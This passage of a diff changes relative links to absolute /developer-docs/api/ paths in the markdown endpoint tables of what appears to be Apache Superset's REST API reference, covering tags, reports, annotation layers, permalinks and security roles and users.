| `PUT` | [Update a saved query](/developer-docs/api/update-a-saved-query) | `/api/v1/saved_query/{pk}` |
|
||||
| `GET` | [Get distinct values from field data (saved-query-distinct-column-name)](/developer-docs/api/get-distinct-values-from-field-data-saved-query-distinct-column-name) | `/api/v1/saved_query/distinct/{column_name}` |
|
||||
| `GET` | [Download multiple saved queries as YAML files](/developer-docs/api/download-multiple-saved-queries-as-yaml-files) | `/api/v1/saved_query/export/` |
|
||||
| `POST` | [Import saved queries with associated databases](/developer-docs/api/import-saved-queries-with-associated-databases) | `/api/v1/saved_query/import/` |
|
||||
| `GET` | [Get related fields data (saved-query-related-column-name)](/developer-docs/api/get-related-fields-data-saved-query-related-column-name) | `/api/v1/saved_query/related/{column_name}` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -240,7 +240,7 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | [Get possible values for a datasource column](./api/get-possible-values-for-a-datasource-column) | `/api/v1/datasource/{datasource_type}/{datasource_id}/column/{column_name}/values/` |
|
||||
| `GET` | [Get possible values for a datasource column](/developer-docs/api/get-possible-values-for-a-datasource-column) | `/api/v1/datasource/{datasource_type}/{datasource_id}/column/{column_name}/values/` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -249,8 +249,8 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | [Return an AdvancedDataTypeResponse](./api/return-an-advanceddatatyperesponse) | `/api/v1/advanced_data_type/convert` |
|
||||
| `GET` | [Return a list of available advanced data types](./api/return-a-list-of-available-advanced-data-types) | `/api/v1/advanced_data_type/types` |
|
||||
| `GET` | [Return an AdvancedDataTypeResponse](/developer-docs/api/return-an-advanceddatatyperesponse) | `/api/v1/advanced_data_type/convert` |
|
||||
| `GET` | [Return a list of available advanced data types](/developer-docs/api/return-a-list-of-available-advanced-data-types) | `/api/v1/advanced_data_type/types` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -261,21 +261,21 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `DELETE` | [Bulk delete tags](./api/bulk-delete-tags) | `/api/v1/tag/` |
|
||||
| `GET` | [Get a list of tags](./api/get-a-list-of-tags) | `/api/v1/tag/` |
|
||||
| `POST` | [Create a tag](./api/create-a-tag) | `/api/v1/tag/` |
|
||||
| `GET` | [Get metadata information about tag API endpoints](./api/get-metadata-information-about-tag-api-endpoints) | `/api/v1/tag/_info` |
|
||||
| `POST` | [Add tags to an object](./api/add-tags-to-an-object) | `/api/v1/tag/{object_type}/{object_id}/` |
|
||||
| `DELETE` | [Delete a tagged object](./api/delete-a-tagged-object) | `/api/v1/tag/{object_type}/{object_id}/{tag}/` |
|
||||
| `DELETE` | [Delete a tag](./api/delete-a-tag) | `/api/v1/tag/{pk}` |
|
||||
| `GET` | [Get a tag detail information](./api/get-a-tag-detail-information) | `/api/v1/tag/{pk}` |
|
||||
| `PUT` | [Update a tag](./api/update-a-tag) | `/api/v1/tag/{pk}` |
|
||||
| `DELETE` | [Delete tag by pk favorites](./api/delete-tag-by-pk-favorites) | `/api/v1/tag/{pk}/favorites/` |
|
||||
| `POST` | [Create tag by pk favorites](./api/create-tag-by-pk-favorites) | `/api/v1/tag/{pk}/favorites/` |
|
||||
| `POST` | [Bulk create tags and tagged objects](./api/bulk-create-tags-and-tagged-objects) | `/api/v1/tag/bulk_create` |
|
||||
| `GET` | [Get tag favorite status](./api/get-tag-favorite-status) | `/api/v1/tag/favorite_status/` |
|
||||
| `GET` | [Get all objects associated with a tag](./api/get-all-objects-associated-with-a-tag) | `/api/v1/tag/get_objects/` |
|
||||
| `GET` | [Get related fields data (tag-related-column-name)](./api/get-related-fields-data-tag-related-column-name) | `/api/v1/tag/related/{column_name}` |
|
||||
| `DELETE` | [Bulk delete tags](/developer-docs/api/bulk-delete-tags) | `/api/v1/tag/` |
|
||||
| `GET` | [Get a list of tags](/developer-docs/api/get-a-list-of-tags) | `/api/v1/tag/` |
|
||||
| `POST` | [Create a tag](/developer-docs/api/create-a-tag) | `/api/v1/tag/` |
|
||||
| `GET` | [Get metadata information about tag API endpoints](/developer-docs/api/get-metadata-information-about-tag-api-endpoints) | `/api/v1/tag/_info` |
|
||||
| `POST` | [Add tags to an object](/developer-docs/api/add-tags-to-an-object) | `/api/v1/tag/{object_type}/{object_id}/` |
|
||||
| `DELETE` | [Delete a tagged object](/developer-docs/api/delete-a-tagged-object) | `/api/v1/tag/{object_type}/{object_id}/{tag}/` |
|
||||
| `DELETE` | [Delete a tag](/developer-docs/api/delete-a-tag) | `/api/v1/tag/{pk}` |
|
||||
| `GET` | [Get a tag detail information](/developer-docs/api/get-a-tag-detail-information) | `/api/v1/tag/{pk}` |
|
||||
| `PUT` | [Update a tag](/developer-docs/api/update-a-tag) | `/api/v1/tag/{pk}` |
|
||||
| `DELETE` | [Delete tag by pk favorites](/developer-docs/api/delete-tag-by-pk-favorites) | `/api/v1/tag/{pk}/favorites/` |
|
||||
| `POST` | [Create tag by pk favorites](/developer-docs/api/create-tag-by-pk-favorites) | `/api/v1/tag/{pk}/favorites/` |
|
||||
| `POST` | [Bulk create tags and tagged objects](/developer-docs/api/bulk-create-tags-and-tagged-objects) | `/api/v1/tag/bulk_create` |
|
||||
| `GET` | [Get tag favorite status](/developer-docs/api/get-tag-favorite-status) | `/api/v1/tag/favorite_status/` |
|
||||
| `GET` | [Get all objects associated with a tag](/developer-docs/api/get-all-objects-associated-with-a-tag) | `/api/v1/tag/get_objects/` |
|
||||
| `GET` | [Get related fields data (tag-related-column-name)](/developer-docs/api/get-related-fields-data-tag-related-column-name) | `/api/v1/tag/related/{column_name}` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -284,20 +284,20 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `DELETE` | [Delete multiple annotation layers in a bulk operation](./api/delete-multiple-annotation-layers-in-a-bulk-operation) | `/api/v1/annotation_layer/` |
|
||||
| `GET` | [Get a list of annotation layers (annotation-layer)](./api/get-a-list-of-annotation-layers-annotation-layer) | `/api/v1/annotation_layer/` |
|
||||
| `POST` | [Create an annotation layer (annotation-layer)](./api/create-an-annotation-layer-annotation-layer) | `/api/v1/annotation_layer/` |
|
||||
| `GET` | [Get metadata information about this API resource (annotation-layer--info)](./api/get-metadata-information-about-this-api-resource-annotation-layer-info) | `/api/v1/annotation_layer/_info` |
|
||||
| `DELETE` | [Delete annotation layer (annotation-layer-pk)](./api/delete-annotation-layer-annotation-layer-pk) | `/api/v1/annotation_layer/{pk}` |
|
||||
| `GET` | [Get an annotation layer (annotation-layer-pk)](./api/get-an-annotation-layer-annotation-layer-pk) | `/api/v1/annotation_layer/{pk}` |
|
||||
| `PUT` | [Update an annotation layer (annotation-layer-pk)](./api/update-an-annotation-layer-annotation-layer-pk) | `/api/v1/annotation_layer/{pk}` |
|
||||
| `DELETE` | [Bulk delete annotation layers](./api/bulk-delete-annotation-layers) | `/api/v1/annotation_layer/{pk}/annotation/` |
|
||||
| `GET` | [Get a list of annotation layers (annotation-layer-pk-annotation)](./api/get-a-list-of-annotation-layers-annotation-layer-pk-annotation) | `/api/v1/annotation_layer/{pk}/annotation/` |
|
||||
| `POST` | [Create an annotation layer (annotation-layer-pk-annotation)](./api/create-an-annotation-layer-annotation-layer-pk-annotation) | `/api/v1/annotation_layer/{pk}/annotation/` |
|
||||
| `DELETE` | [Delete annotation layer (annotation-layer-pk-annotation-annotation-id)](./api/delete-annotation-layer-annotation-layer-pk-annotation-annotation-id) | `/api/v1/annotation_layer/{pk}/annotation/{annotation_id}` |
|
||||
| `GET` | [Get an annotation layer (annotation-layer-pk-annotation-annotation-id)](./api/get-an-annotation-layer-annotation-layer-pk-annotation-annotation-id) | `/api/v1/annotation_layer/{pk}/annotation/{annotation_id}` |
|
||||
| `PUT` | [Update an annotation layer (annotation-layer-pk-annotation-annotation-id)](./api/update-an-annotation-layer-annotation-layer-pk-annotation-annotation-id) | `/api/v1/annotation_layer/{pk}/annotation/{annotation_id}` |
|
||||
| `GET` | [Get related fields data (annotation-layer-related-column-name)](./api/get-related-fields-data-annotation-layer-related-column-name) | `/api/v1/annotation_layer/related/{column_name}` |
|
||||
| `DELETE` | [Delete multiple annotation layers in a bulk operation](/developer-docs/api/delete-multiple-annotation-layers-in-a-bulk-operation) | `/api/v1/annotation_layer/` |
|
||||
| `GET` | [Get a list of annotation layers (annotation-layer)](/developer-docs/api/get-a-list-of-annotation-layers-annotation-layer) | `/api/v1/annotation_layer/` |
|
||||
| `POST` | [Create an annotation layer (annotation-layer)](/developer-docs/api/create-an-annotation-layer-annotation-layer) | `/api/v1/annotation_layer/` |
|
||||
| `GET` | [Get metadata information about this API resource (annotation-layer--info)](/developer-docs/api/get-metadata-information-about-this-api-resource-annotation-layer-info) | `/api/v1/annotation_layer/_info` |
|
||||
| `DELETE` | [Delete annotation layer (annotation-layer-pk)](/developer-docs/api/delete-annotation-layer-annotation-layer-pk) | `/api/v1/annotation_layer/{pk}` |
|
||||
| `GET` | [Get an annotation layer (annotation-layer-pk)](/developer-docs/api/get-an-annotation-layer-annotation-layer-pk) | `/api/v1/annotation_layer/{pk}` |
|
||||
| `PUT` | [Update an annotation layer (annotation-layer-pk)](/developer-docs/api/update-an-annotation-layer-annotation-layer-pk) | `/api/v1/annotation_layer/{pk}` |
|
||||
| `DELETE` | [Bulk delete annotation layers](/developer-docs/api/bulk-delete-annotation-layers) | `/api/v1/annotation_layer/{pk}/annotation/` |
|
||||
| `GET` | [Get a list of annotation layers (annotation-layer-pk-annotation)](/developer-docs/api/get-a-list-of-annotation-layers-annotation-layer-pk-annotation) | `/api/v1/annotation_layer/{pk}/annotation/` |
|
||||
| `POST` | [Create an annotation layer (annotation-layer-pk-annotation)](/developer-docs/api/create-an-annotation-layer-annotation-layer-pk-annotation) | `/api/v1/annotation_layer/{pk}/annotation/` |
|
||||
| `DELETE` | [Delete annotation layer (annotation-layer-pk-annotation-annotation-id)](/developer-docs/api/delete-annotation-layer-annotation-layer-pk-annotation-annotation-id) | `/api/v1/annotation_layer/{pk}/annotation/{annotation_id}` |
|
||||
| `GET` | [Get an annotation layer (annotation-layer-pk-annotation-annotation-id)](/developer-docs/api/get-an-annotation-layer-annotation-layer-pk-annotation-annotation-id) | `/api/v1/annotation_layer/{pk}/annotation/{annotation_id}` |
|
||||
| `PUT` | [Update an annotation layer (annotation-layer-pk-annotation-annotation-id)](/developer-docs/api/update-an-annotation-layer-annotation-layer-pk-annotation-annotation-id) | `/api/v1/annotation_layer/{pk}/annotation/{annotation_id}` |
|
||||
| `GET` | [Get related fields data (annotation-layer-related-column-name)](/developer-docs/api/get-related-fields-data-annotation-layer-related-column-name) | `/api/v1/annotation_layer/related/{column_name}` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -306,14 +306,14 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `DELETE` | [Bulk delete CSS templates](./api/bulk-delete-css-templates) | `/api/v1/css_template/` |
|
||||
| `GET` | [Get a list of CSS templates](./api/get-a-list-of-css-templates) | `/api/v1/css_template/` |
|
||||
| `POST` | [Create a CSS template](./api/create-a-css-template) | `/api/v1/css_template/` |
|
||||
| `GET` | [Get metadata information about this API resource (css-template--info)](./api/get-metadata-information-about-this-api-resource-css-template-info) | `/api/v1/css_template/_info` |
|
||||
| `DELETE` | [Delete a CSS template](./api/delete-a-css-template) | `/api/v1/css_template/{pk}` |
|
||||
| `GET` | [Get a CSS template](./api/get-a-css-template) | `/api/v1/css_template/{pk}` |
|
||||
| `PUT` | [Update a CSS template](./api/update-a-css-template) | `/api/v1/css_template/{pk}` |
|
||||
| `GET` | [Get related fields data (css-template-related-column-name)](./api/get-related-fields-data-css-template-related-column-name) | `/api/v1/css_template/related/{column_name}` |
|
||||
| `DELETE` | [Bulk delete CSS templates](/developer-docs/api/bulk-delete-css-templates) | `/api/v1/css_template/` |
|
||||
| `GET` | [Get a list of CSS templates](/developer-docs/api/get-a-list-of-css-templates) | `/api/v1/css_template/` |
|
||||
| `POST` | [Create a CSS template](/developer-docs/api/create-a-css-template) | `/api/v1/css_template/` |
|
||||
| `GET` | [Get metadata information about this API resource (css-template--info)](/developer-docs/api/get-metadata-information-about-this-api-resource-css-template-info) | `/api/v1/css_template/_info` |
|
||||
| `DELETE` | [Delete a CSS template](/developer-docs/api/delete-a-css-template) | `/api/v1/css_template/{pk}` |
|
||||
| `GET` | [Get a CSS template](/developer-docs/api/get-a-css-template) | `/api/v1/css_template/{pk}` |
|
||||
| `PUT` | [Update a CSS template](/developer-docs/api/update-a-css-template) | `/api/v1/css_template/{pk}` |
|
||||
| `GET` | [Get related fields data (css-template-related-column-name)](/developer-docs/api/get-related-fields-data-css-template-related-column-name) | `/api/v1/css_template/related/{column_name}` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -324,8 +324,8 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `POST` | [Create a new dashboard's permanent link](./api/create-a-new-dashboard-s-permanent-link) | `/api/v1/dashboard/{pk}/permalink` |
|
||||
| `GET` | [Get dashboard's permanent link state](./api/get-dashboard-s-permanent-link-state) | `/api/v1/dashboard/permalink/{key}` |
|
||||
| `POST` | [Create a new dashboard's permanent link](/developer-docs/api/create-a-new-dashboard-s-permanent-link) | `/api/v1/dashboard/{pk}/permalink` |
|
||||
| `GET` | [Get dashboard's permanent link state](/developer-docs/api/get-dashboard-s-permanent-link-state) | `/api/v1/dashboard/permalink/{key}` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -334,8 +334,8 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `POST` | [Create a new permanent link (explore-permalink)](./api/create-a-new-permanent-link-explore-permalink) | `/api/v1/explore/permalink` |
|
||||
| `GET` | [Get chart's permanent link state](./api/get-chart-s-permanent-link-state) | `/api/v1/explore/permalink/{key}` |
|
||||
| `POST` | [Create a new permanent link (explore-permalink)](/developer-docs/api/create-a-new-permanent-link-explore-permalink) | `/api/v1/explore/permalink` |
|
||||
| `GET` | [Get chart's permanent link state](/developer-docs/api/get-chart-s-permanent-link-state) | `/api/v1/explore/permalink/{key}` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -344,8 +344,8 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `POST` | [Create a new permanent link (sqllab-permalink)](./api/create-a-new-permanent-link-sqllab-permalink) | `/api/v1/sqllab/permalink` |
|
||||
| `GET` | [Get permanent link state for SQLLab editor.](./api/get-permanent-link-state-for-sqllab-editor) | `/api/v1/sqllab/permalink/{key}` |
|
||||
| `POST` | [Create a new permanent link (sqllab-permalink)](/developer-docs/api/create-a-new-permanent-link-sqllab-permalink) | `/api/v1/sqllab/permalink` |
|
||||
| `GET` | [Get permanent link state for SQLLab editor.](/developer-docs/api/get-permanent-link-state-for-sqllab-editor) | `/api/v1/sqllab/permalink/{key}` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -354,7 +354,7 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | [Get a report schedule log (embedded-dashboard-uuid)](./api/get-a-report-schedule-log-embedded-dashboard-uuid) | `/api/v1/embedded_dashboard/{uuid}` |
|
||||
| `GET` | [Get a report schedule log (embedded-dashboard-uuid)](/developer-docs/api/get-a-report-schedule-log-embedded-dashboard-uuid) | `/api/v1/embedded_dashboard/{uuid}` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -363,10 +363,10 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `POST` | [Create a dashboard's filter state](./api/create-a-dashboard-s-filter-state) | `/api/v1/dashboard/{pk}/filter_state` |
|
||||
| `DELETE` | [Delete a dashboard's filter state value](./api/delete-a-dashboard-s-filter-state-value) | `/api/v1/dashboard/{pk}/filter_state/{key}` |
|
||||
| `GET` | [Get a dashboard's filter state value](./api/get-a-dashboard-s-filter-state-value) | `/api/v1/dashboard/{pk}/filter_state/{key}` |
|
||||
| `PUT` | [Update a dashboard's filter state value](./api/update-a-dashboard-s-filter-state-value) | `/api/v1/dashboard/{pk}/filter_state/{key}` |
|
||||
| `POST` | [Create a dashboard's filter state](/developer-docs/api/create-a-dashboard-s-filter-state) | `/api/v1/dashboard/{pk}/filter_state` |
|
||||
| `DELETE` | [Delete a dashboard's filter state value](/developer-docs/api/delete-a-dashboard-s-filter-state-value) | `/api/v1/dashboard/{pk}/filter_state/{key}` |
|
||||
| `GET` | [Get a dashboard's filter state value](/developer-docs/api/get-a-dashboard-s-filter-state-value) | `/api/v1/dashboard/{pk}/filter_state/{key}` |
|
||||
| `PUT` | [Update a dashboard's filter state value](/developer-docs/api/update-a-dashboard-s-filter-state-value) | `/api/v1/dashboard/{pk}/filter_state/{key}` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -375,10 +375,10 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `POST` | [Create a new form_data](./api/create-a-new-form-data) | `/api/v1/explore/form_data` |
|
||||
| `DELETE` | [Delete a form_data](./api/delete-a-form-data) | `/api/v1/explore/form_data/{key}` |
|
||||
| `GET` | [Get a form_data](./api/get-a-form-data) | `/api/v1/explore/form_data/{key}` |
|
||||
| `PUT` | [Update an existing form_data](./api/update-an-existing-form-data) | `/api/v1/explore/form_data/{key}` |
|
||||
| `POST` | [Create a new form_data](/developer-docs/api/create-a-new-form-data) | `/api/v1/explore/form_data` |
|
||||
| `DELETE` | [Delete a form_data](/developer-docs/api/delete-a-form-data) | `/api/v1/explore/form_data/{key}` |
|
||||
| `GET` | [Get a form_data](/developer-docs/api/get-a-form-data) | `/api/v1/explore/form_data/{key}` |
|
||||
| `PUT` | [Update an existing form_data](/developer-docs/api/update-an-existing-form-data) | `/api/v1/explore/form_data/{key}` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -389,17 +389,17 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `DELETE` | [Bulk delete report schedules](./api/bulk-delete-report-schedules) | `/api/v1/report/` |
|
||||
| `GET` | [Get a list of report schedules](./api/get-a-list-of-report-schedules) | `/api/v1/report/` |
|
||||
| `POST` | [Create a report schedule](./api/create-a-report-schedule) | `/api/v1/report/` |
|
||||
| `GET` | [Get metadata information about this API resource (report--info)](./api/get-metadata-information-about-this-api-resource-report-info) | `/api/v1/report/_info` |
|
||||
| `DELETE` | [Delete a report schedule](./api/delete-a-report-schedule) | `/api/v1/report/{pk}` |
|
||||
| `GET` | [Get a report schedule](./api/get-a-report-schedule) | `/api/v1/report/{pk}` |
|
||||
| `PUT` | [Update a report schedule](./api/update-a-report-schedule) | `/api/v1/report/{pk}` |
|
||||
| `GET` | [Get a list of report schedule logs](./api/get-a-list-of-report-schedule-logs) | `/api/v1/report/{pk}/log/` |
|
||||
| `GET` | [Get a report schedule log (report-pk-log-log-id)](./api/get-a-report-schedule-log-report-pk-log-log-id) | `/api/v1/report/{pk}/log/{log_id}` |
|
||||
| `GET` | [Get related fields data (report-related-column-name)](./api/get-related-fields-data-report-related-column-name) | `/api/v1/report/related/{column_name}` |
|
||||
| `GET` | [Get slack channels](./api/get-slack-channels) | `/api/v1/report/slack_channels/` |
|
||||
| `DELETE` | [Bulk delete report schedules](/developer-docs/api/bulk-delete-report-schedules) | `/api/v1/report/` |
|
||||
| `GET` | [Get a list of report schedules](/developer-docs/api/get-a-list-of-report-schedules) | `/api/v1/report/` |
|
||||
| `POST` | [Create a report schedule](/developer-docs/api/create-a-report-schedule) | `/api/v1/report/` |
|
||||
| `GET` | [Get metadata information about this API resource (report--info)](/developer-docs/api/get-metadata-information-about-this-api-resource-report-info) | `/api/v1/report/_info` |
|
||||
| `DELETE` | [Delete a report schedule](/developer-docs/api/delete-a-report-schedule) | `/api/v1/report/{pk}` |
|
||||
| `GET` | [Get a report schedule](/developer-docs/api/get-a-report-schedule) | `/api/v1/report/{pk}` |
|
||||
| `PUT` | [Update a report schedule](/developer-docs/api/update-a-report-schedule) | `/api/v1/report/{pk}` |
|
||||
| `GET` | [Get a list of report schedule logs](/developer-docs/api/get-a-list-of-report-schedule-logs) | `/api/v1/report/{pk}/log/` |
|
||||
| `GET` | [Get a report schedule log (report-pk-log-log-id)](/developer-docs/api/get-a-report-schedule-log-report-pk-log-log-id) | `/api/v1/report/{pk}/log/{log_id}` |
|
||||
| `GET` | [Get related fields data (report-related-column-name)](/developer-docs/api/get-related-fields-data-report-related-column-name) | `/api/v1/report/related/{column_name}` |
|
||||
| `GET` | [Get slack channels](/developer-docs/api/get-slack-channels) | `/api/v1/report/slack_channels/` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -410,16 +410,16 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | [Get security roles](./api/get-security-roles) | `/api/v1/security/roles/` |
|
||||
| `POST` | [Create security roles](./api/create-security-roles) | `/api/v1/security/roles/` |
|
||||
| `GET` | [Get security roles info](./api/get-security-roles-info) | `/api/v1/security/roles/_info` |
|
||||
| `DELETE` | [Delete security roles by pk](./api/delete-security-roles-by-pk) | `/api/v1/security/roles/{pk}` |
|
||||
| `GET` | [Get security roles by pk](./api/get-security-roles-by-pk) | `/api/v1/security/roles/{pk}` |
|
||||
| `PUT` | [Update security roles by pk](./api/update-security-roles-by-pk) | `/api/v1/security/roles/{pk}` |
|
||||
| `POST` | [Create security roles by role_id permissions](./api/create-security-roles-by-role-id-permissions) | `/api/v1/security/roles/{role_id}/permissions` |
|
||||
| `GET` | [Get security roles by role_id permissions](./api/get-security-roles-by-role-id-permissions) | `/api/v1/security/roles/{role_id}/permissions/` |
|
||||
| `PUT` | [Update security roles by role_id users](./api/update-security-roles-by-role-id-users) | `/api/v1/security/roles/{role_id}/users` |
|
||||
| `GET` | [List roles](./api/list-roles) | `/api/v1/security/roles/search/` |
|
||||
| `GET` | [Get security roles](/developer-docs/api/get-security-roles) | `/api/v1/security/roles/` |
|
||||
| `POST` | [Create security roles](/developer-docs/api/create-security-roles) | `/api/v1/security/roles/` |
|
||||
| `GET` | [Get security roles info](/developer-docs/api/get-security-roles-info) | `/api/v1/security/roles/_info` |
|
||||
| `DELETE` | [Delete security roles by pk](/developer-docs/api/delete-security-roles-by-pk) | `/api/v1/security/roles/{pk}` |
|
||||
| `GET` | [Get security roles by pk](/developer-docs/api/get-security-roles-by-pk) | `/api/v1/security/roles/{pk}` |
|
||||
| `PUT` | [Update security roles by pk](/developer-docs/api/update-security-roles-by-pk) | `/api/v1/security/roles/{pk}` |
|
||||
| `POST` | [Create security roles by role_id permissions](/developer-docs/api/create-security-roles-by-role-id-permissions) | `/api/v1/security/roles/{role_id}/permissions` |
|
||||
| `GET` | [Get security roles by role_id permissions](/developer-docs/api/get-security-roles-by-role-id-permissions) | `/api/v1/security/roles/{role_id}/permissions/` |
|
||||
| `PUT` | [Update security roles by role_id users](/developer-docs/api/update-security-roles-by-role-id-users) | `/api/v1/security/roles/{role_id}/users` |
|
||||
| `GET` | [List roles](/developer-docs/api/list-roles) | `/api/v1/security/roles/search/` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -428,12 +428,12 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | [Get security users](./api/get-security-users) | `/api/v1/security/users/` |
|
||||
| `POST` | [Create security users](./api/create-security-users) | `/api/v1/security/users/` |
|
||||
| `GET` | [Get security users info](./api/get-security-users-info) | `/api/v1/security/users/_info` |
|
||||
| `DELETE` | [Delete security users by pk](./api/delete-security-users-by-pk) | `/api/v1/security/users/{pk}` |
|
||||
| `GET` | [Get security users by pk](./api/get-security-users-by-pk) | `/api/v1/security/users/{pk}` |
|
||||
| `PUT` | [Update security users by pk](./api/update-security-users-by-pk) | `/api/v1/security/users/{pk}` |
|
||||
| `GET` | [Get security users](/developer-docs/api/get-security-users) | `/api/v1/security/users/` |
|
||||
| `POST` | [Create security users](/developer-docs/api/create-security-users) | `/api/v1/security/users/` |
|
||||
| `GET` | [Get security users info](/developer-docs/api/get-security-users-info) | `/api/v1/security/users/_info` |
|
||||
| `DELETE` | [Delete security users by pk](/developer-docs/api/delete-security-users-by-pk) | `/api/v1/security/users/{pk}` |
|
||||
| `GET` | [Get security users by pk](/developer-docs/api/get-security-users-by-pk) | `/api/v1/security/users/{pk}` |
|
||||
| `PUT` | [Update security users by pk](/developer-docs/api/update-security-users-by-pk) | `/api/v1/security/users/{pk}` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -442,9 +442,9 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | [Get security permissions](./api/get-security-permissions) | `/api/v1/security/permissions/` |
|
||||
| `GET` | [Get security permissions info](./api/get-security-permissions-info) | `/api/v1/security/permissions/_info` |
|
||||
| `GET` | [Get security permissions by pk](./api/get-security-permissions-by-pk) | `/api/v1/security/permissions/{pk}` |
|
||||
| `GET` | [Get security permissions](/developer-docs/api/get-security-permissions) | `/api/v1/security/permissions/` |
|
||||
| `GET` | [Get security permissions info](/developer-docs/api/get-security-permissions-info) | `/api/v1/security/permissions/_info` |
|
||||
| `GET` | [Get security permissions by pk](/developer-docs/api/get-security-permissions-by-pk) | `/api/v1/security/permissions/{pk}` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -453,12 +453,12 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | [Get security resources](./api/get-security-resources) | `/api/v1/security/resources/` |
|
||||
| `POST` | [Create security resources](./api/create-security-resources) | `/api/v1/security/resources/` |
|
||||
| `GET` | [Get security resources info](./api/get-security-resources-info) | `/api/v1/security/resources/_info` |
|
||||
| `DELETE` | [Delete security resources by pk](./api/delete-security-resources-by-pk) | `/api/v1/security/resources/{pk}` |
|
||||
| `GET` | [Get security resources by pk](./api/get-security-resources-by-pk) | `/api/v1/security/resources/{pk}` |
|
||||
| `PUT` | [Update security resources by pk](./api/update-security-resources-by-pk) | `/api/v1/security/resources/{pk}` |
|
||||
| `GET` | [Get security resources](/developer-docs/api/get-security-resources) | `/api/v1/security/resources/` |
|
||||
| `POST` | [Create security resources](/developer-docs/api/create-security-resources) | `/api/v1/security/resources/` |
|
||||
| `GET` | [Get security resources info](/developer-docs/api/get-security-resources-info) | `/api/v1/security/resources/_info` |
|
||||
| `DELETE` | [Delete security resources by pk](/developer-docs/api/delete-security-resources-by-pk) | `/api/v1/security/resources/{pk}` |
|
||||
| `GET` | [Get security resources by pk](/developer-docs/api/get-security-resources-by-pk) | `/api/v1/security/resources/{pk}` |
|
||||
| `PUT` | [Update security resources by pk](/developer-docs/api/update-security-resources-by-pk) | `/api/v1/security/resources/{pk}` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -467,12 +467,12 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | [Get security permissions resources](./api/get-security-permissions-resources) | `/api/v1/security/permissions-resources/` |
|
||||
| `POST` | [Create security permissions resources](./api/create-security-permissions-resources) | `/api/v1/security/permissions-resources/` |
|
||||
| `GET` | [Get security permissions resources info](./api/get-security-permissions-resources-info) | `/api/v1/security/permissions-resources/_info` |
|
||||
| `DELETE` | [Delete security permissions resources by pk](./api/delete-security-permissions-resources-by-pk) | `/api/v1/security/permissions-resources/{pk}` |
|
||||
| `GET` | [Get security permissions resources by pk](./api/get-security-permissions-resources-by-pk) | `/api/v1/security/permissions-resources/{pk}` |
|
||||
| `PUT` | [Update security permissions resources by pk](./api/update-security-permissions-resources-by-pk) | `/api/v1/security/permissions-resources/{pk}` |
|
||||
| `GET` | [Get security permissions resources](/developer-docs/api/get-security-permissions-resources) | `/api/v1/security/permissions-resources/` |
|
||||
| `POST` | [Create security permissions resources](/developer-docs/api/create-security-permissions-resources) | `/api/v1/security/permissions-resources/` |
|
||||
| `GET` | [Get security permissions resources info](/developer-docs/api/get-security-permissions-resources-info) | `/api/v1/security/permissions-resources/_info` |
|
||||
| `DELETE` | [Delete security permissions resources by pk](/developer-docs/api/delete-security-permissions-resources-by-pk) | `/api/v1/security/permissions-resources/{pk}` |
|
||||
